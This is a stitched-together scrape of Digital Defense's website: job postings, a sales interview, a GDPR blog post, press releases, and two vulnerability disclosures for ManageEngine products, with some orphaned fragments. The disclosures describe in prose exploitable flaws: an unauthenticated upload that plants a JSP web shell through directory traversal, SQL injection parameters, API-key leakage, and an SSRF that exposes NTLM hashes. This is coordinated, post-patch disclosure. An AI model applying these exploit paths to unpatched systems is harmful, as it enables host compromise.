Experience with designing and writing unit-tests for your code is a plus.

Education & Experience:

Bachelor’s degree in Computer Science or related technical field from an accredited university is preferable.

Personality:

Detail-oriented, with a passion for automation.

Must be capable of working both independently and as part of a dynamic team.

Desire the simple, elegant solution over the complex solution.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment.

Blog

**Editor’s Note: “7 Minutes” is a feature where we ask channel executives from startups – or companies that may be new to the Channel Partners audience – a series of quick questions about their businesses and channel programs.**

Armed with its vulnerability management-as-a-service (VMaaS) platform and security awareness training, Digital Defense is taking aim at its competitors in the crowded cybersecurity market.

A security technology and services provider, Digital Defense recently was named a leading provider in two categories, cybersecurity training and education (No. 3) and compliance and risk management (No. 10) by Black Book Market Research. It surveyed nearly 2,500 security professionals from 680 provider organizations.

In April, the company announced Frontline.Cloud was deployed in the Amazon Web Services (AWS) Cloud. The deployment allowed its Alliance Partners, MSSPs, SIs and VARs to address customers’ security-assessment needs in compliance with the General Data Protection Regulation (GDPR).

In a Q&A with Channel Partners, Rosanna Pellegrino, Digital Defense’s senior vice president of sales and business development, talks about what gives her company and its partners a competitive advantage, as well as the company’s evolving platform.

Rosanna Pellegrino: The secret selling (sauce) for partners is to make it easy to use, easy to deploy and easy to manage. It allows customers to quickly get up and running on our platform and provides information that’s operational immediately. Customers get to look at their environment in a simple way and know immediately what needs to be addressed. For partners, it’s the tip of the spear. This allows partners to start conversations regarding security within their customers’ environments very easily.

We make the whole process easier for resellers and easy for their customers. That’s what I think is the most important piece. It’s not just only, “What can you do for my environment?” but also, “How can it make me more secure?” The ability to identify the vulnerabilities and minimize the false positives is important. The quality of the output of the reports, the fidelity of the data, and just the whole experience of dealing with the organization are key. A reseller can take Digital Defense to their customers with confidence because the last thing they want to do is bring in a product that fails and not be able to call into that account again. And then secondly, it helps them penetrate into new accounts with a product that is effective, efficient, has quality of output and is differentiated in the market.

CP: Describe your channel program — metal levels, heavy on certifications, open or selective, unique features? Do you work with masters and/or distributors?

RP: No tiers, no certifications and no levels because we’re looking for strategic partners — ideally partners that can wrap services around our offering because it makes a more complete solution to their end users. What we do for them is protect them in the opportunity. We offer deal registration, which is an industry standard, but we also offer protection around deal enablement and fulfilment. If they bring us a deal, then at the end the customer procurement team needs to get additional bids, (and) we protect their enablement margin. Anybody that comes to us saying they want to bid this opportunity gets a fulfillment margin. There is a huge delta in that so that they can’t come in and take the deal away from a partner that’s actually worked the deal. That’s protection, more than just incentive. If you put the time in, we will protect you through every opportunity and to ensure that account ownership. (No work with masters or distributors.)

CP: Quick-hit answers: Percentage of sales through the channel, number of partners, average margin. Go.

CP: Who are your main competitors, and what makes your offering better?

RP: Rapid 7, Qualys, Tenable. And what makes us better is our offering. There’s no hardware or software for partners to maintain. Digital Defense maintains all that, eliminating the burden. All of Digital Defense’s platform resides within the AWS platform. The patents we have on our technology differentiates us from competitors because those patents actually remove the pain points that customers have today with many other platforms.

At the end of the day, what makes me different than my competition is our platform. It makes the end users’ job easier because there are [fewer] false positives, it is easy to use, easy to deploy, and then we have a team of subject-matter experts that they can call on when questions arise or they need something researched. We supply a staff of resources that are dedicated to our customers, so they would know the person’s customer and partner contacts by name. And for the reseller, it helps because the reseller can go, “OK, Mr. Customer, let’s call your client advocate or I can call your client advocate and we can work through this issue.” It makes it a seamless process and everybody’s working together, and it’s not a pool of people all over the world where you might not get the same guy and have to re-explain yourself each time you call in.

CP: How do you think your technology portfolio will change in the next three years?

RP: The current platform will continue to evolve. There are areas that Digital Defense is looking to expand in that will enhance and complement our offerings. In other areas it will be more strategic to partner with best-in-class platforms where there is benefit to our mutual customers to integrate. As our competitors evolve, they’re looking to capture revenue by getting into other areas … where they are encroaching on their partners’ customer products. We’re developing our platform, making sure that it continually evolves and identifies vulnerabilities, and gives you good, clean data. But having said that, there are some complementary overlays or adjacent areas that we may want to bring into the platform to see how we can make it even stronger and more effective for our customers.

For example, Digital Defense’s move into the cyber threat space occurred as a result of expressed interest from our client base and a strategic focus on growth through expansion of products and services that are adjacent to the company’s core security assessment offerings. The new cyber-threat line provides a natural complement to our current suite of solutions. Our clients can now receive relevant, actionable threat intelligence, gleaned from the dark, deep and surface web which may help thwart current or future cyberattacks through high quality cyber threat evaluations.

CP: How do you expect your channel strategy to evolve over that time frame?

RP: From a strategic prospective, as I look at my current channel partners and as the threat landscape changes, the platform supports their changing business to address their customer needs. Businesses need to get to the point where they could remediate or be proactive, so I see the platform evolving to a point that it helps strengthen the partner offering, therefore strengthening the security posture of their customers. Most organizations are still evolving from a security maturity perspective. There isn’t enough talent and expertise to fill the gaps today. So for Digital Defense, being able to provide something that helps them become subject-matter experts to their customers helps them (as well as us) grow.

CP: What didn’t we ask that partners should know?

RP: Customers and resellers should know that our Frontline platform is a highly scalable, very stable platform that provides relevant, actionable data at competitive pricing. For partners, that translates into opportunities because it differentiates them. What partners need to consider is everyone is selling multiple competing solutions. When you go into an opportunity, you might have three or four guys quoting the same product (in a tiered partner structure). You might be going up against a competitive reseller, at a disadvantage as their margin is maybe a 40 percent discount and you may only get 20 percent, so you’re already at a disadvantage especially when you’re trying to break into new accounts. What we offer is a stable, scalable, effective product that differentiates you, and also protects your margins and your price point.

]]>
Why GDPR Compliance Should Just Be “The Icing” on the Security Cakehttps://www.digitaldefense.com/blog/why-gdpr-compliance-icing-on-the-security-cake/
https://www.digitaldefense.com/?p=67892018-05-21T15:43:02+00:00Kim Carlos

Why GDPR Compliance Should Just Be “The Icing” on the Security Cake

Blog

With the deadline for GDPR compliance only 5 days away, the countdown is on and the panic is setting in. But why? While the U.S. has historically been a highly regulated country, the EU’s data privacy regulations have not kept up with the evolving threats, until now.

The GDPR is vast and so wide reaching that it effects countries outside the EU if they hold or process any EU citizen data. But you probably already know that or you wouldn’t be reading this. The real question is, why should you not care?

Why GDPR compliance shouldn’t be your focus.

The ‘fear-factor’ messaging is running rampant among vendors positioning their solutions as a failsafe for compliance. It is easy for company leaders to get swept up in the hype and forget what the GDPR is really about, security. After all, you can’t keep data private without securing it, and you can’t comply without keeping data private.

Organizations have been checking off boxes for compliance since requirements were put around governance and risk management. But checking off boxes without assessing where an organization is truly vulnerable is exactly what has led to the constant headlines about hacks and data theft.

If security is your primary goal, you can back into compliance requirements and check off that little box that makes us all feel so accomplished, while knowing you’re doing the right things to protect PII and your brand reputation.

Where to start? Keep it simple.

Start by knowing where you are susceptible to a data breach with a vulnerability scan.

Digital Defense provides services to organizations subject to the GDPR by aiding them in securing their assets and network to demonstrate that appropriate measures are implemented to protect the GDPR in-scope data. In the event enforcement measures are taken against an organization due to a breach of GDPR, our services like Frontline VM™, Frontline WAS™, etc., prove due diligence in adhering to a code of conduct or certification in compliance with data protection principles.

Vulnerability management, risk assessments, data privacy and protection are really all just kissing cousins. If your ultimate goal is security and you do the right things to protect your data, complying with regulations will just be the icing on the cake.

Leverage the GDPR driver to push through security initiatives.

Whether you are a global, U.S. or Canadian company, the GDPR likely applies to your business; even if it somehow doesn’t, it is definitely a data privacy best practice to implement as it clearly calls out ISO 27001 as a framework to help comply. The fines can be astronomical, up to 4% of annual global turnover or €20 Million (whichever is greater). What better reason than that to have budget align with putting innovative security safeguards in place?

Burying your head in the sand is a surefire way to tank your brand trust because hackers are just getting more efficient and sophisticated. They will come at you again and again. Will you be prepared? Organizations that put the security of customer and employee data first are the resilient brands that stand the test of time–and of breach.

Click here to find out how Digital Defense can help with GDPR compliance efforts.

Black Book Market Research LLC surveyed over 2,464 security professionals from 680 provider organizations to identify gaps, vulnerabilities and deficiencies that persist in keeping hospitals and physicians proverbial sitting ducks for data breaches and cyberattacks. One frightening statistic uncovered was that – Thirty-two percent of healthcare organizations did not scan for vulnerabilities before an attack.

“HIPAA does not specifically require a penetration test or vulnerability scan. It does, however, require covered entities to perform risk analysis and test security controls – of which vulnerability scanning and penetration testing are integral,” said Larry Hurtado, CEO of Digital Defense, Inc. “Further, NIST has issued a special recommendation for HIPAA that calls for penetration testing of security controls to determine actual vulnerability exposure, as well as the need for deficiency documentation such that appropriate remediation steps can be taken.”

Leveraging the company’s industry recognized and awarded vulnerability scanner, to run scans that don’t interfere with daily business operations, is just one way Digital Defense is helping IT personnel safeguard data. They also got creative and developed an effective and entertaining security awareness program (SecurED®) designed to optimize employee retention of essential security best practices.

Digital Defense continues to pioneer cloud-based solutions and expand its research staff to provide new system capabilities, offerings, and critical compliance and cyber risk insight including:

A Cyber Threat Management solution that scans the Dark Web and provides actionable threat intelligence to help thwart current or future cyber-attacks.

A Vulnerability Research Team that continues to uncover critical zero-day vulnerabilities in industry leading technologies.

About Digital Defense
Serving clients across numerous industries from small businesses to very large enterprises, Digital Defense’s innovative and leading-edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline.Cloud, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, five-star review in SC Magazine and inclusion in CRN’s MSP 500.

Biography and Background:
Rosanna Pellegrino brings more than 30 years of experience within IT Security, professional services, product strategy and technology integrations to Digital Defense in her role as SVP of Sales and Business Development. Pellegrino is responsible for all sales and channel development, strategic alliances and global market coverage. Previously, she established strategic go-to market channel partnerships with KPMG, PWC, ePlus, Dimension Data and others. Pellegrino built a global network of sales channels and managed technology integrations with KPMG, PWC, ePlus, Dimension Data, CheckPoint Software, BAE, Carbon Black, McAfee and many others. With Qualys she headed up product strategy and integrations, with partners including Dell SecureWorks and Accenture. She also led global business development for RedSeal Networks, were she established technology and go-to-market partnerships with McAfee, Symantec, Palo Alto, Cisco and others.

How have you personally helped advance your company’s channel business over the past year?
Over the last year, have created an easy to do business with channel program that allows partners a path to success. What does easy mean? For a channel partner it represents the following: 1. Easy to get support – dedicated Channel Account Team, along Technical Account Managers that can work with customer requests 2. Easy to quote – the ability for quick creation of proposals outlining customer requests 3. Deal protection – not only do partners have the ability to register new deals for increased margins but also protection on renewals for their customer base

What are your goals for your company’s channel business over the next year?
Goals for the channel business is to increase the joint revenue opportunities, but also insure that these partners are supported and can take advantage of not only the Frontline platform but also the strategic technology integrations to provide a holistic solution to their customer base. The ability to understand how Frontline fits into enterprise’s eco systems will allow partners to a strategic advantage, as they not only will be able to position Frontline but also how it fits into the overall workflow of the customer environment thus reinforcing their expertise and value to the customer.

What honors, awards, or commendations have you won over the past year?
none

Outside of your family, please name a woman you admire and why:
They women that I admire are not known to the world, nor do they have fame or fortune. They are simply selfless individuals that give of themselves with little or no acknowledgement. These women silently accomplish so much making others around them more comfortable, productive and/or successful. For me it is taking the time to notice these contributions to the world around us and acknowledging these women each day. I would recommend that each of us take time out of our day to notice these women that are much deserving of our admiration but too often not acknowledged.

What advice would you give your 16-year-old self?
Best advice I could have given myself is to have confidence in my ability to learn new things. Once out of school you don’t stop learning new things, and don’t let anyone tell you differently. Just because it is something new or unknown does not mean you cannot understand or apply it to your everyday life, either work or personal. If you have passion then you will be the best you can be no matter what you try. Do not measure your success or failures against others because your dynamics and life experiences make you different.

If you could master any new job-related skill, what would it be and why?
When starting out in the industry I was a technical resource to customers and partners, as my career has evolved I miss those days. With the ever-changing landscape of new technology, it would be great to capture some things that I have missed or do not quite understand.

What’s the best book you read this past year and why did you like it?
Typically read technical journals and books

(Click the image for a larger version)

I also took a look at how Windows Server Update Services (WSUS) handles this superseding situation. Once again, it only shows I am missing a ‘Moderate’ risk update and that I should manually “verify…the superseding update first.”

Blog

Facebook, Walmart, FedEx, Walmart kick off the new year with data breach headlines

Although Facebook has dominated the cybersecurity media headlines over the past few weeks, and the hacks on major brands before that, a careful read through our latest cybercrime diary reveals that organizations of all types and sizes globally are under continual cyber attack.

“Cybercrime is rampant and continually evolving, so always look to minimize or ‘shrink your attack surface’ by understanding both present and past vulnerabilities,” says Gordon MacKay, EVP and CTO at Digital Defense, a trusted provider of security risk assessment solutions, protecting billions of dollars in assets for clients around the globe.

To view the complete entries of the 2018 CYBERCRIME DIARY, click here.

Blog

Organizations that procure cybersecurity services are increasingly looking not just for private cloud-based approaches, but products that operate from public cloud environments, says Larry Hurtado, CEO of security technology and service provider Digital Defense.

“First and foremost, our move to Amazon has primarily been to enable our clients to assess … premises, cloud and hybrid environments with relative ease,” he says. But the move will also facilitate easier scanning within the Amazon environment, he says, as well as enable organizations to better handle different countries’ data residency requirements.

In addition, the company is helping organizations seek out any stolen data or information that might be in circulation on the dark web via improved threat management capabilities.

Hurtado is president and CEO of Digital Defense. Previously, he co-founded and served as president of international operations for Elastic Networks and served as vice president of business line management for Nortel Networks.

ManageEngine Disclosure #3

Blog

Digital Defense is disclosing vulnerabilities identified in ManageEngine’s ADSelfService Plus application. ManageEngine was prompt in responding to the identified flaws and providing fixes for these security issues.

Details: The ADSelfService Plus product is vulnerable to a Server-Side Request Forgery (SSRF) which can be leveraged to obtain NTLM hashes when the service is configured to use heightened privileges. The disclosed hash can then be relayed to other assets. This application is often configured to use heightened privileges for Active Directory password resets and can be found externally.

Research & Development: VRT Engineer

Careers

Digital Defense Inc. is looking for a Vulnerability Research Team (VRT) Engineer to work in our Research & Development division on our next-generation security product offerings. This job will entail working on our network-scanning technology which sweeps networks for various vulnerabilities and threat conditions. Applicants should have backgrounds working with languages such as Python or Perl and a good understanding of sockets and network programming and ideally a passion for cyber-security tools and techniques.

Ideal candidates would have the following:

Experience working with programming languages such as Python or Perl on Linux systems.

High Interest in Security / Penetration Testing / Hacking Techniques is a plus.

Recent graduate in with a college degree in a technical field such as Computer Science or Information Assurance.

(We’ll also consider candidates with solid work experience in place of this)

Solid understanding and familiarity with the Linux operating system.

Solid understanding of network protocols and tools such as Wireshark.

Experience working with virtualization technology such as VMWare is a plus.

Experience working with software version control systems such as GIT or Mercurial is a plus.

Some experience working with standard info-sec toolchains such as Nmap, Metasploit, and Burpsuite is considered a plus.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment

Relaxed dress code and fun team oriented work environment

About Digital Defense:

Digital Defense is a growing, profitable, privately held company in the San Antonio area with a great team oriented atmosphere and a focus on building out next-generation security technology and services. We’ve recently been recognized by SC Magazine (2017 Best Buy – Vulnerability Management), Frost & Sullivan (2017 – Best Scan Engine), San Antonio Business Journal (Tech Titans: Top Cybersecurity Company), and the Cybersecurity 500 (#16) for our technology and growth.

Launch of Cyber Threat Management Offering

Blog

San Antonio, TX—April 11, 2018—Digital Defense, Inc., a security technology and services provider, today announced the launch of a new product line offering, Frontline Cyber Threat Management (Frontline CTM™), a trio of predictive cyber intelligence solutions. The introduction of the cyber threat line provides organizations with early warning of serious threats that otherwise, without knowledge of the potential exposure, could result in exposure and negative repercussions.

Digital Defense’s move into the cyber threat space occurs as a result of expressed interest from the firm’s client base and a strategic focus on growth through expansion of products and services that are adjacent to the company’s core security assessment offerings.

Larry Hurtado, president and CEO, states, “The introduction of the Frontline CTM line is a natural complement to Digital Defense’s current suite of solutions. Our clients will receive relevant, actionable threat intelligence, gleaned from the “Dark Web”, which may help thwart current or future cyber-attacks through high quality cyber threat evaluations.”

The Frontline CTM line includes:

At-a-Glance summary of high level external threats and risks to an organization’s brand, technology infrastructure, data and employees. Real-time data collection from the surface, deep and Dark Web offers insight into activity around an organization’s digital assets.

Serving clients across numerous industries from small businesses to very large enterprises, Digital Defense’s innovative and leading edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine and inclusion in CRN’s MSP 500.

Digital Defense, Inc.

Frontline VM™ Scores among Top 3 of 12

in VRM “Current Offering” Category

San Antonio, TX—March 05, 2018—Digital Defense, Inc., a security technology and services provider, has been named a Strong Performer in The Forrester Wave™: Vulnerability Risk Management, Q1 2018 report.

The report focuses on key vulnerability risk management criteria – now more important than ever for security and risk management professionals who increasingly rely upon VRM to address leading IT security challenges. Traditional vulnerability management focused on vulnerability enumeration, and low false-positive reporting therein. As the Forrester Wave report states, the VRM process includes asset identification, enumeration, prioritization, and remediation.

“Our solution priorities have remained consistent and clear – first provide the industry’s highest level of assessment accuracy; next provide the best ease of use via prioritization and remediation,” said Mike Cotton, Senior Vice President of Engineering at Digital Defense. “To be named a Strong Performer – and to have Forrester, in our opinion, validate the importance of those needs for modern buyers – tells us we are delivering the value that matters”

A copy of the Forrester WAVE, Vulnerability Risk Management report can be downloaded here.

Leverage the power of Frontline VM with a no cost 30 day evaluation. Register here.

About Digital Defense

Serving clients across numerous industries, from small businesses to very large enterprises, Digital Defense’s innovative and leading edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products are underpinned by patented technology and complemented with unparalleled service and support.

Digital Defense Launches AWS-Based Frontline.Cloud Platform

Digital Defense, Inc.

Pioneer of Cloud Solutions Further Simplifies Assessing

Security of Hybrid Networks

San Antonio, TX—April 4, 2018—Digital Defense, Inc., a security technology and services provider, announced the company’s proprietary platform, Frontline.Cloud, is now deployed in the Amazon Web Services (AWS) Cloud. Housed entirely in AWS, the platform, already industry recognized for ease of use and rapid deployment, now offers organizations significant administration efficiencies for assessing premise-based, cloud, or hybrid network implementations.

The Frontline.Cloud Platform supports multiple offerings including Frontline Vulnerability Manager™, Frontline Penetration Testing™, and Frontline Web Application Scanning™, all of which are now available in the AWS environment. Regardless of whether assets are located in the cloud, on customer premises, or both, Frontline.Cloud systems can be used to evaluate the security posture of systems, networks, and applications. Underpinned with patented security scanning and results management technologies, the Frontline.Cloud platform delivers high quality results and includes unified management and comprehensive reporting. Extensive application programming interfaces are also available, enabling tight integration with 3rd party cloud and/or premise-based systems resulting in effective automation of security operations.

“Having Frontline.Cloud available through AWS provides tremendous value for organizations wanting to proactively secure networks and applications,” said Larry Hurtado, CEO, Digital Defense, Inc. “As a native cloud-designed system, the cost, startup time, and complexity associated with assessing hybrid environments with multiple management consoles are eliminated. The simplicity of deployment and manageability gives organizations a platform designed to meet their changing needs. Frontline.Cloud also automates the time-intensive process of VPC connection setup and maintenance. Additionally, the platform can scale to hundreds of thousands of assets on a single system.”

The Frontline.Cloud AWS deployment enables Digital Defense’s Alliance Partners, Managed Security Solution Providers (MSSPs), System Integrators (SIs), and Value-Added Resellers (VARs) to easily address the security assessment needs of their customers in a GDPR-compliant manner. New customers also have a fast path to trial or deployment; and existing customers can quickly and easily administer on-demand assessments to respond to an acute security threat or to evaluate the health of IT assets associated with a M&A event.

Serving clients across numerous industries, from small businesses to very large enterprises, Digital Defense’s innovative and leading-edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine and inclusion in CRN’s MSP 500.

Digital Defense, Inc.

When: June 4-6, 2018

Where: Gaylord National Harbor Resort, National Harbor, MD

Digital Defense, Inc. is proud to announce that we are a Silver Sponsor at this year’s Gartner Security & Risk Management Summit. We invite you to visit us at booth #129 to to hear more about Frontline.Cloud, our industry recognized Security assessment platform, now residing in the Amazon Web Services (AWS) cloud.

Digital Defense Sponsors Medina Valley CyberPatriot Program

Digital Defense, Inc.

San Antonio, TX –March 23, 2018–Digital Defense, Inc, a security technology and services provider and longtime supporter of the CyberPatriot program is pleased to announce their sponsorship of the Medina Valley CyberPatriot program.

CyberPatriot is the National Youth Cyber Education Program created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our nation’s future.

Frederick F. Hall, Medina Valley CyberPatriots coach, shared, “The vision of the Medina Valley CyberPatriots program is to promote cyber awareness, computer security practices, and cyber ethics. All of these are essential attributes for creating a secure network infrastructure, teaching the students how to detect threats, and how to defend against cyber-attacks in a safe virtual environment.”

Digital Defense has been actively engaged with area educational institutions such as Medina Valley and Southwest High School through mentorships and the donation of equipment in support of the school’s participation in the national CyberPatriot initiatives. As a sponsor of the upcoming San Antonio Mayor’s Cyber Cup Luncheon on Saturday March 24th, the company will be present to cheer on and recognize area CyberPatriot teams.

Larry Hurtado, president & CEO of Digital Defense states, “We believe it is important to actively nurture education programs such as the Medina Valley CyberPatriot curriculum to ensure that our communities are fostering cyber talent that will help to fill the important positions within organizations around the globe that are essential to fighting cybercrime.”

About Digital Defense

Serving clients across numerous industries from small businesses to very large enterprises, Digital Defense’s innovative and leading edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine and inclusion in CRN’s MSP 500.

ManageEngine Disclosure #2

Blog

Digital Defense is disclosing multiple additional vulnerabilities identified on various ManageEngine applications discovered by our Vulnerability Research Team (VRT). We commend ManageEngine for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these cyber security issues.

ManageEngine has provided patches for each of the vulnerabilities identified on the applications. The patched applications can be downloaded from ManageEngine’s website.

Details:

Impact: Remote code execution with the same privileges as the user that started the Eventlog.

Application/Version Affected:

EventLog Analyzer 11.8 (Build 11080)

Log360 5.3 (Build 5036)

Details: The com.adventnet.sa.agent.UploadHandlerServlet class can be accessed via POST requests to /agentUpload. The servlet expects a multipart POST request containing a zip file and a “chksum” parameter containing an encrypted MD5 checksum of the uploaded zip file. The servlet decrypts the “chksum” parameter using the “decrypt” method of the EnDecryptImpl class. After decrypting the user supplied MD5 checksum, the servlet generates its own MD5 checksum of the uploaded zip file and compares the two values. If the comparison fails, the uploaded file is deleted. If the comparison is successful the uploaded filename is processed by the com.adventnet.sa.server.agent.DataProcessor class.

The “unzipFile” method of the DataProcessor class extracts the zip file and checks to see if at least one string from a set of strings is in the filename before writing the file. The list of strings used for the comparison is related to the types of files the class expects to be processing. No authentication is required to access the UploadHandlerServlet via /agentUpload, the “chksum” parameter is encrypted using a static key and no sanitation is done on the filenames in the uploaded zip before extracting them. This can all be leveraged to upload a JSP web shell with a filename containing a directory traversal sequence which will cause the web shell to be written to the web root when extracted by the DataProcessor class.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: The com.adventnet.appmanager.servlets.comm.AAMRequestProcessor servlet can be accessed via a GET or POST request to /servlet/aam_servercmd without authentication. The AAMRequestProcessor servlet first checks to see if the build number supplied via the “bn” request parameter matches the build number of the current installation of Applications Manager. The build number of the targeted Applications Manager application can be found at the bottom of the login page at /index.do. AAMRequestProcessor also checks that the “time_stamp” and “port” request parameters are numbers. To get to the “addMAS” method of CommDBUtil, the “command” parameter should be set to “Register_Me_MAS” and the Applications Manager server should be configured as an admin server. The request parameters are converted to a Map and passed as an argument to the “addMAS” method of CommDBUtil where the “globalrange” request parameter is used directly in a SQL query without validation.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: The SyncEventServlet class can be accessed by either a GET or POST request to /servlet/SyncEventServlet. If the installation of Applications Manager is running as an admin server and the “operation” request parameter is set to “checkEventSynch”, then the “entity” request parameter will be used directly in a SQL query, without sanitization. Additionally, if Applications Manager is running as a managed server and the “operation” request parameter is set to “setPushModelStatus”, then the “EventID” request parameter will be used directly in a SQL query without sanitization.

Details: The FailOverHelperServlet class can be accessed by sending a POST request to /servlet/FailOverHelperServlet, no authentication required. If the “operation” request parameter is set to “copyfile”, the servlet will pass the value of the “fileName” request parameter to the copyFile method. The copyFile method performs some basic filtering on the value of the “fileName” request parameter, including checking for directory traversal sequences and limiting the path to the “working” subdirectory of the Applications Manager install directory. Additionally, it will only retrieve the file if it’s been modified since the last time it was downloaded. However, the working directory can contain interesting files, such as the Postgresql database data files, when configured to use the built-in Postgres database. Additionally, there is a “listdirectory” operation in this servlet that will return a list of files and directories in the “working” directory, making it relatively easy to find potentially interesting files to download.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: The MenuHandlerServlet servlet can be accessed via a GET or POST request to /servlet/MenuHandlerServlet without authentication. If the “action” request parameter is set to “verticalmenulist” the value of the “config_id” request parameter will be passed to the “getVerticalMenus” method. The “getVerticalMenus” method uses the value of “config_id” directly in a SQL query without fully validating it.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

Details: A GET request to /servlet/OPMRequestHandlerServlet where the “OPERATION_TYPE” request parameter is set to “APM_API_KEY_REQUEST” and the “USERNAME” request parameter is set to any valid user will return that user’s API key. Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it.

ManageEngine is an innovative producer of enterprise IT management software, offering high-end functionality of large network management frameworks to enterprises worldwide. Currently, the company claims to have more than 40,000 customers worldwide, including three out of every five Fortune 500 company.

“Our Vulnerability Research Team continues to work in tandem with ManageEngine to facilitate prompt resolution of the issues and a coordinated effort in the disclosure process that ensures customers make the necessary patches to mitigate any potential risk introduced by the vulnerabilities,” states Mike Cotton, senior vice president of engineering at Digital Defense.

What You Can Do

ManageEngine has addressed the vulnerabilities and is making patches available for each of the affected applications. Patches can be downloaded from the ManageEngine site. Digital Defense’s Frontline Vulnerability Manager™ includes checks for the flaws. Details surrounding the disclosure can be accessed at the Digital Defense blog.

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT, when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

About Digital Defense

Serving clients across numerous industries, from small businesses to very large enterprises, Digital Defense’s innovative and leading edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline Vulnerability Manager™, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, are highly-regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, top 20 ranking (#16) in Cybersecurity Ventures’ list of the World’s 500 Hottest Cybersecurity Companies, five-star review in SC Magazine, and inclusion in CRN’s MSP 500.

Join Us at RSA Conference 2018 | Booth #3230

Digital Defense, Inc.

When: April 16-20, 2018

Where: Moscone Center, San Francisco, CA

Booth #: 3230 (North Hall)

Digital Defense, Inc. is excited to announce that we will have a significant presence at RSA Conference 2018™, where the world’s best and brightest in the filed learn about IT security’s most important issues.

Attending RSA? We invite you to visit us at booth #3230 to experience Frontline.Cloud, our next generation vulnerability management platform.

This annual list recognizes North American solution providers with cutting-edge approaches to delivering managed services. Their offerings help companies navigate the complex and ever-changing landscape of IT, improve operational efficiencies, and maximize their return on IT investments.

In today’s fast-paced business environments, MSPs play an important role in helping companies leverage new technologies without straining their budgets or losing focus on their core business. CRN’s MSP 500 list shines a light on the most forward-thinking and innovative of these key organizations.

The list is divided into three categories: the MSP Pioneer 250, recognizing companies with business models weighted toward managed services and largely focused on the SMB market; the MSP Elite 150, recognizing large, data center-focused MSPs with a strong mix of on-premises and off-premises services; and the Managed Security 100, recognizing MSPs focused primarily on off-premise, cloud-based security services.

Digital Defense offers channel partners a portfolio of security risk assessment solutions underpinned by patented technology that benefits the partners’ customers with unparalleled accuracy and flexibility, ease of use and superior support and service. Partners enjoy a steady revenue stream, short sales cycles, increased margins and a high client retention rate – all critical to a successful channel partner engagement.

“Managed service providers have become integral to the success of businesses everywhere, both large and small,” said Bob Skelley, CEO of The Channel Company. “Capable MSPs enable companies to take their cloud computing to the next level, streamline spending, effectively allocate limited resources and navigate the vast field of available technologies. The companies on CRN’s 2018 MSP 500 list stand out for their innovative services, excellence in adapting to customers’ changing needs and demonstrated ability to help businesses get the most out of their IT investments.”

“The Digital Defense Partner Program is structured to answer channel needs based on customer demand,” said Rosanna Pellegrino, SVP sales and business development at Digital Defense, Inc. “Digital Defense’s industry recognized technology is integrated with numerous industry-leading security platforms, creating comprehensive customer solutions that provide significant opportunities to increase both product and services revenue. Strong financial opportunities combined with sales and marketing support, ensure a great opportunity to improve security and grow profits.”

The MSP500 list will be featured in the February 2018 issue of CRN and online at www.CRN.com/msp500.

About Digital Defense
